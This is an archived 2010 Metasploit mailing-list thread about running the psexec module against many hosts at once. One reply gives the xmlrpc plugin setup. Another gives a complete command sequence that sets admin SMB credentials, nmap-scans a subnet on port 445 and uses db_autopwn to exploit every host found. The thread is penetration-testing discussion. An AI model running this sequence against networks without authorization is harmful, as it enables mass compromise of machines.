Metasploit mailing list archives

Re: mods to psexec

From: Nelson <komseh () gmail com>
Date: Thu, 25 Mar 2010 23:02:45 -0600

Here's how I do it:
setg SMBUser Administrator
setg SMBPass Password
setg SMBDomain DOMAIN (if needed)
db_driver postgresql
db_create msf:msf@localhost/msf
db_nmap -p445 192.168.1.1-254
db_autopwn -p -e -r -m psexec

On Thu, Mar 25, 2010 at 11:22 AM, Ulisses Castro <uss.thebug () gmail com> wrote:
On Thu, Mar 25, 2010 at 8:59 AM, Robin Wood <dninja () gmail com> wrote:

Hi
I've been asked by a colleague how easy it would be to modify psexec
so it would take multiple hosts rather than a single one. Each session
that came back would then be backgrounded or sent off to a
multi-handler.

Before I spend any time looking into doing this I wanted to check if
there was any better way to do it or if the functionality already
existed in other modules. If not then I'll have a look and see if I
can come up with some code.

Hi Robin!
You can use Metasploit with xmlrpc plugin + any language that support xml...
just:
msf > load xmlrpc Pass=123456 ServerType=Web
[*] XMLRPC Service: 127.0.0.1:55553
[*] XMLRPC Username: msf
[*] XMLRPC Password: 123456
[*] XMLRPC Server Type: Web
[*] XMLRPC Web URI: /RPC2
[*] Successfully loaded plugin: xmlrpc
msf >
And now you can automate whatever you want inside Metasploit, just write
some script/program that send metasploit commands via xmlrpc, a good example
is Nsploit.
Good post about this:
http://blog.happypacket.net/2009/12/psexec-scanner-via-metasploit-xmlrpc.html
Btw, you could try the new Ruby implementation in .RC files like HD said.
Cheers,
Ulisses

Robin